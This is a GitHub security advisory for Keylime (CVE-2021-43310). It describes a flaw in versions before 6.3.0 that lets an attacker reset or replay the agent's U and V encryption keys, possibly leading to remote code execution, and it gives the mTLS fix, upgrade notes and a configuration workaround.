Skip to content

Keylime: malicious reset or replay of U and V encryption

High
mpeters published GHSA-2m39-75g9-ff5r Jan 27, 2022

Package

keylime (Keylime)

Affected versions

<6.2.x

Patched versions

6.3.0

Description

Impact

This vulnerability allows an attacker to craft a request to the agent that resets the U and V keys as if the agent were being re-added to a verifier. These new keys will break attestation from that node going forward as it will be different keys than the verifier has on record. As part of this request, new revocation and attestation actions can be added and depending on how the client is configured, this could lead to remote code execution.
Also an attacker could capture a valid U, V keys and payload and resend it to the agent, because the agent cannot verify the freshness of the payload and there was no transport security for that data.

Fix

The communication between the agent and the verifier and tenant are now encrypted and authenticated using mTLS.
On the agent a Keylime CA (by default the cv_ca) is configured that is used to authenticate the verifier and tenant.
During registration the agent provides also a certificate to ensure that the verifier and tenant can also verify the connection to the agent.

Going forward the Keylime CA on the agent will be used to ensure encrypted communication between the agent and the Keylime server components and is mandatory.

This fixes also fixed potential information leakage through the quotes interface using UEFI and IMA logs.

Patches

Users should upgrade to at least 6.3.x.

Note that if you want to upgrade the server components first and then the agent components, first upgrade to 6.3.0.
6.4.0 will disable support for API version "1.0" to enforce the new protocol.

Workarounds

To block the remote code execution set the change the options in the keylime.conf:

  • extract_payload_zip = True to extract_payload_zip = False
  • payload_script=autorun.sh to payload_script=

Note that this still allows an attacker to overwrite the payload.

Credit

Many thanks to Matthias Gerstner and Thore Sommer for both finding this issue independently.
The fix was developed by Thore Sommer.

For more information

If you have any questions or comments about this advisory:

Severity

High

CVE ID

CVE-2021-43310

Weaknesses

Credits